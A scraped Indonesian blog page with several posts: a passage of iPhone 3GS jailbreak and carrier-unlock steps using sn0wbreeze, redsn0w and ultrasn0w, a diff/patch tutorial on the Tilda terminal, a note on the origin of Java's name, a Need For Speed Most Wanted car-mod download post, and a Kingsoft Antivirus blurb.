4. Jalankan sn0wbreeze
5. masukan IPSW nya = "iPhone2,1_5.1.1_9B206_Restore.ipsw"



6. pilih yang "New Bootroom" & Next



7. mode : "BaseBand preservation mode"




8. Tunggu sampai proses selesai, dia akan membuat File "sn0wbreeze_iPhone_3GS-5.1.1-9B206.ipsw" & diletakan di Desktop
8. Next, Next & Next, sampai ada petunjuk untuk masuk ke mode DFU.
9. setelah selesai, Masuk ke iTunes, pilih device iPhone anda, dan merestore file "sn0wbreeze_iPhone_3GS-5.1.1-9B206.ipsw" Dengan Shift + restore

10. setelah iOs 5.1.1 "sn0wbreeze_iPhone_3GS-5.1.1-9B206.ipsw" terinstall selanjutnya kita jailbreak dengan redsn0w "iPhone2,1_5.1.1_9B206_Restore.ipsw"

11. setelah selesai, tinggal permasalahan pada operator nya, silahkan buka "cydia => Manage => Sources, & Edit => Add => http://repo666.ultrasn0w.com & http://repo.iparelhos.com"

12. Search & install "ultrasn0w fixer for 5.1.1 & ultrasn0w"

Selesai.

Posted on 3:51 PM by Unknown

1 comment

Pendahuluan

Tujuan pembuatan patch[1] adalah untuk memperbaiki masalah yang ada pada software, misalnya bugs, celah ataupun untuk memperbaiki performa software. Salah satu cara membuat patch adalah dengan menggunakan diff[2]. Pada tutorial singkat kali ini, akan dibahas cara membuat patch menggunakan diff serta cara mengaplikasikan patch yang sudah dibuat.

Langkah-langkah:

  • Sebagai contoh kali ini, kita akan membuat patch untuk aplikasi tilda[3] untuk mengubah titlenya dari "Tilda" menjadi "shell". Pertama-tama, ekstrak source code tilda ke dalam dua direktori:


$ tar -xzf tilda-0.9.6.tar.gz
$ mv tilda-0.9.6 tilda-0.9.6-orig
$ tar -xzf tilda-0.9.6.tar.gz


  • Dari langkah di atas, terdapat 2 direktori yaitu "tilda-0.9.6-orig" dan "tilda-0.9.6". Kita akan mengubah file yang ada pada direktori "tilda-0.9.6" lalu membandingkan dengan yang original. Sekarang, kita mencari title yang akan diganti pada sub direktori "tilda-0.9.6/src" menggunakan perintah "grep"


$ grep Tilda tilda-0.9.6/src/*.c
tilda-0.9.6/src/configsys.c:    CFG_STR("title", "Tilda", CFGF_NONE),
tilda-0.9.6/src/key_converter.c: * This is an extremely simple converter for the Tilda-0.9.4 and less
tilda-0.9.6/src/key_converter.c: * key format to the new Tilda-0.9.5 key format, which is the standard
tilda-0.9.6/src/tilda.c:        { "hidden",             'h', 0, G_OPTION_ARG_NONE,      &hidden,            _("Start Tilda hidden"), NULL },
tilda-0.9.6/src/tilda_window.c:    label = gtk_label_new ("Tilda");
tilda-0.9.6/src/wizard.c:    window_title = g_strdup_printf ("Tilda %d Config", ltw->instance);


  • Yang akan kita ubah adalah pada file "configsys.c" dan "tilda_window.c". kita cukup menggunakan perintah "sed" untuk mengubahnya.


$ sed -i 's/Tilda/shell/' tilda-0.9.6/src/configsys.c
$ sed -i 's/Tilda/shell/' tilda-0.9.6/src/tilda_window.c


  • Langkah berikutnya adalah yang utama yaitu membuat patch menggunakan diff. Kita akan menggunakan opsi "-u" untuk membuat unified diff[4]. Opsi ini umum digunakan untuk membuat patch pada proyek-proyek open source. Caranya adalah seperti ini:


$ diff -ru tilda-0.9.6-orig tilda-0.9.6 > tilda_title.diff


  • Opsi "-r" kita gunakan untuk melakukan proses diff secara rekursif ke dalam subdirektori. Adapun outputnya nanti akan ditulis ke file "tilda_title.diff". Hasilnya seperti ini:


$ cat tilda_title.diff
diff -ru tilda-0.9.6-orig/src/configsys.c tilda-0.9.6/src/configsys.c
--- tilda-0.9.6-orig/src/configsys.c    2007-12-11 23:02:40.000000000 +0700
+++ tilda-0.9.6/src/configsys.c    2012-01-15 15:01:09.000000076 +0700
@@ -25,7 +25,7 @@
     CFG_STR("command", "", CFGF_NONE),
     CFG_STR("font", "Monospace 13", CFGF_NONE),
     CFG_STR("key", NULL, CFGF_NONE),
-    CFG_STR("title", "Tilda", CFGF_NONE),
+    CFG_STR("title", "shell", CFGF_NONE),
     CFG_STR("background_color", "white", CFGF_NONE),
     CFG_STR("working_dir", NULL, CFGF_NONE),
     CFG_STR("web_browser", "firefox", CFGF_NONE),
diff -ru tilda-0.9.6-orig/src/tilda_window.c tilda-0.9.6/src/tilda_window.c
--- tilda-0.9.6-orig/src/tilda_window.c    2008-01-18 05:07:39.000000000 +0700
+++ tilda-0.9.6/src/tilda_window.c    2012-01-15 15:01:20.903000078 +0700
@@ -482,7 +482,7 @@
     }

     /* Create page and append to notebook */
-    label = gtk_label_new ("Tilda");
+    label = gtk_label_new ("shell");
     /* Strangely enough, prepend puts pages on the end */
     index = gtk_notebook_prepend_page (GTK_NOTEBOOK(tw->notebook), tt->hbox, label);
     gtk_notebook_set_tab_label_packing (GTK_NOTEBOOK(tw->notebook), tt->hbox, TRUE, TRUE, GTK_PACK_END);
$


  • Nah, untuk contoh penggunaannya, terlebih dahulu hapus ke-2 direktori tilda tadi, kemudian ekstrak ulang source tilda yang asli:


$ rm -rf tilda-0.9.6 tilda-0.9.6-orig/
$ tar -xzf tilda-0.9.6.tar.gz


  • Gunakan perintah "patch" dengan menggunakan input file "tilda_title.diff". Untuk mengetahui apa saja yang dilakukan oleh perintah "patch", kita bisa menggunakan opsi "--verbose". Opsi "-p0" diberikan untuk menentukan di direktori mana kita menjalankan patch (silakan lihat man page patch). Nah, caranya adalah sebagai berikut:


$ patch --verbose -p0 < tilda_title.diff
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|diff -ru tilda-0.9.6-orig/src/configsys.c tilda-0.9.6/src/configsys.c
|--- tilda-0.9.6-orig/src/configsys.c    2007-12-11 23:02:40.000000000 +0700
|+++ tilda-0.9.6/src/configsys.c    2012-01-15 15:01:09.000000076 +0700
--------------------------
Patching file tilda-0.9.6/src/configsys.c using Plan A...
Hunk #1 succeeded at 25.
Hmm...  The next patch looks like a unified diff to me...
The text leading up to this was:
--------------------------
|diff -ru tilda-0.9.6-orig/src/tilda_window.c tilda-0.9.6/src/tilda_window.c
|--- tilda-0.9.6-orig/src/tilda_window.c    2008-01-18 05:07:39.000000000 +0700
|+++ tilda-0.9.6/src/tilda_window.c    2012-01-15 15:01:20.903000078 +0700
--------------------------
Patching file tilda-0.9.6/src/tilda_window.c using Plan A...
Hunk #1 succeeded at 482.
done
$


Setelah proses patch berhasil dilakukan, kita tinggal melakukan kompilasi seperti biasa. Selain itu, file "tilda_title.diff" tadi bisa disebarkan agar orang lain bisa melakukan patch juga. Nah, sekian dulu tutorial singkat kali ini, semoga bermanfaat.


Referensi:

[1] http://en.wikipedia.org/wiki/Patch_(computing)
[2] http://en.wikipedia.org/wiki/Diff
[3] http://tilda.sourceforge.net/tildadoc.php
[4] http://en.wikipedia.org/wiki/Diff#Unified_format

Posted on 3:50 PM by Unknown

No comments

Bagi kita di Indonesia, nama Java tentu akrab betul dengan pulau di mana sebagian besar penduduk Indonesia hidup, yaitu pulau Jawa. Tapi, bagi dunia pemrogramming internasional, nama Java terkenal sebagai bahasa pemrograman yang paling populer dipakai. Sebab, sekali menulis di bahasa ini, kamu tak perlu menyalinnya lagi untuk berbagai sistem operasi berbeda.
Java pertama lahir dari para programmer Sun yang terlibat dalam Green Project. Tujuannya untuk membuat bahasa pemrograman sebagai pengendali sebuah peralatan dengan telnologi layar sentuh.

            Setelah bahasa tersebut selesai, mereka menamakan sebagai Oak. Sayangnya, Oak sudah dipakai oleh Oak Technology. Jadilah mereka harus putar otak mencari nama baru. Jadi, kenapa para programmer Green Project itu akhirnya memilih nama Jaya, ya? Ada yang bilang Java diambil dari tiga developer kuncinya: James Gosling, Arthur van Hoff, dan Andy Bechtolsheim. Versi lain menyebutkan bahwa Java diambil dari nama biji kopi dari pulau Jawa.

            Seperti dikutip dari para pelaku Green Project dari javaworld.com, ternyata mereka memang mendapatkan nama Java dari biji kopi tersebut. Dari berbagai nama yang diusulkan, akhirnya terpilih dua nama terfavorit-Java dan Silk. Setelah menimbang-nimbang, James Gosling sepertinya lebih suka dengan nama Java ketimbang Silk. Kim Polese yang jadi manajer produk saat itu juga memilih nama yang sama. Hingga akhirnya semu orang setuju dengan nama itu, seperti dipaparkan Eric Schmidt yang juga terlibat dalam Green Project tersebut. Jadi, tak heran kan lambang Java adalah segelas kopi yang tengah mengepul?

Posted on 3:48 PM by Unknown

No comments

Tuesday, August 28, 2012

Gamers pasti sudah tahu dengan game Need For Speed Most Wanted kan? Game ini memang bisa di bilang termasuk game jadul karena game ini di rilis sekitar tahun 2005 (kalau tidak salah). Tapi jangan kira game ini sudah tidak laku, penggemar game ini masih cukup banyak loh! Terutama dikalangan remaja seperti saya ini! hehehe :D

Untuk para penggemar NFS:MW, mungkin pernah dong merasa bosan dengan koleksi mobilnya yang hanya itu itu saja, atau sekedar ingin merasakan mobil baru yang hanya terdapat pada game NFS keluaran terbaru seperti NFS:Undercover, Shift, The Run, dan lain lain.

Nah, pada kesempatan kali ini, saya akan share koleksi mods mobil untuk Most Wanted versi PC. 
Kalian bisa langsung download melalui link di bawah ini.


Berikut daftar mobil yang terdapat dalam mods :
  • Acura NSX Type S
  • Alfa Romeo 8C Competizione
  • Alpina B6 GT3
  • Aston MArtin DBS Volante
  • Aston Martin one-77
  • Audi R8 v10
  • Audi RSQ
  • Bentley Continental Supersports
  • BMW M3 GT2
  • BMW M3 E92
  • BMW X6 M-Power
  • Bugatti Chiron
  • Bugatti Veyron
  • Bugatti Veyron Supersport
  • Chevrolet Camaro Concept Final
  • Chevrolet Camaro SS Concept
  • Ferrari Enzo SE
  • Ferrari 458 Italia
  • Ferrari 612 Scaglietti
  • Ferrari P4/5-Pininfarina
  • Gumpert Apollo Sport
  • Infiniti G35
  • Jaguar XKR-S
  • Jaguar XKR Speed
  • Koenigsegg Agera
  • Koenigsegg CCX
  • LAmborghini Concept S
  • Lamborghini Reventon Roadster
  • Lamborghini Gallardo LP570-4 Superleggera
  • Lamborghini Futuro Concept
  • Lamborghini Reventon
  • Lexus LFA
  • Lotus Evora
  • Maserati Gran Turismo
  • Maserati Gran Turismo S
  • Maserati MC12-GT
  • Maserati MC12-GT-1
  • Maserati Quatroporte Sport
  • Mazda 787B
  • McLaren F1
  • McLaren MP4-12C
  • Mercedes Benz SLS AMG
  • Mercedes Benz SLR Stirling Moss
  • Mitsubishi Lancer Evolution X
  • Nissan GT-R SpecV
  • Nissan 370Z
  • Pagani Zonda Cinque
  • Pagani Huayra ARG Edition
  • Porsche 959
  • Porsche 911 GT2 
  • Saleen Mustang S281
  • Saleen S5S Raptor
  • Shelby SSC Ultimate Aero
  • Spyker C8 Spyder
  • Toyota Celica TS
  • TVR Sagaris
  • Volkswagen Scirocco
download most wanted mod, most wanted car mod, most wanted addons carsdownload most wanted mod, most wanted car mod, most wanted mod pack
download most wanted mod, most wanted car mod, most wanted addons

Download Need For Speed Most Wanted Mods Collection

Mods ini hanya akan me"replace" / mengganti mobil yang sebelumnya ada di garasi mobil kita, dan bukannya menambah jumlah mobil yang ada didalam game. Tidak semua mod mobil bisa dimasukkan ke dalam game sekaligus karena beberapa mods mobil mewakili satu mobil dalam game untuk di"replace / di ganti. Mod juga tidak bisa digunakan untuk bermain secara LAN, karena bisa menyebabkan error saat dimainkan.

Posted on 10:04 PM by Unknown

No comments

Kingsoft Antivirus merupakan antivirus berbasis tekonologi cloud, dimana antivirus akan menghubungi server cloud untuk melakukan scan terhadap file komputer. Tapi, berbeda seperti cloud antivirus lainnya yang sepertinya jadi tidak berguna saat terputus dari koneksi internet, Kingsoft Antivirus akan berubah mode ke heuristics dan behavior analysis saat komputer dalam keadaan offline. Selain itu, Kingsoft Antivirus juga menambahkan fitur lainnya yang secara proaktif melindungi program chatting, browser internet, dan file download.

Kingsoft Antivirus, download Kingsoft Antivirus, download free antivirus

Terdapat tiga pilihan scan pada Kingsoft antivirus 2012 :

- Full Scan | Memindai secara lengkap semua file pada harddisk

- Quick Scan | Memindai file sistem dan area penting lainnya

- Custom Scan | Memindai file melalui lokasi yang di pilih

Kingsoft antivirus juga menyertakan beberapa fitur lainnya untuk sistem pertahanan komputer :

- Web Defense

- IM Defense

- Video Defense

- Download Shield

- USB Defense

Download Kingsoft Antivirus 2012

Posted on 9:57 PM by Unknown

No comments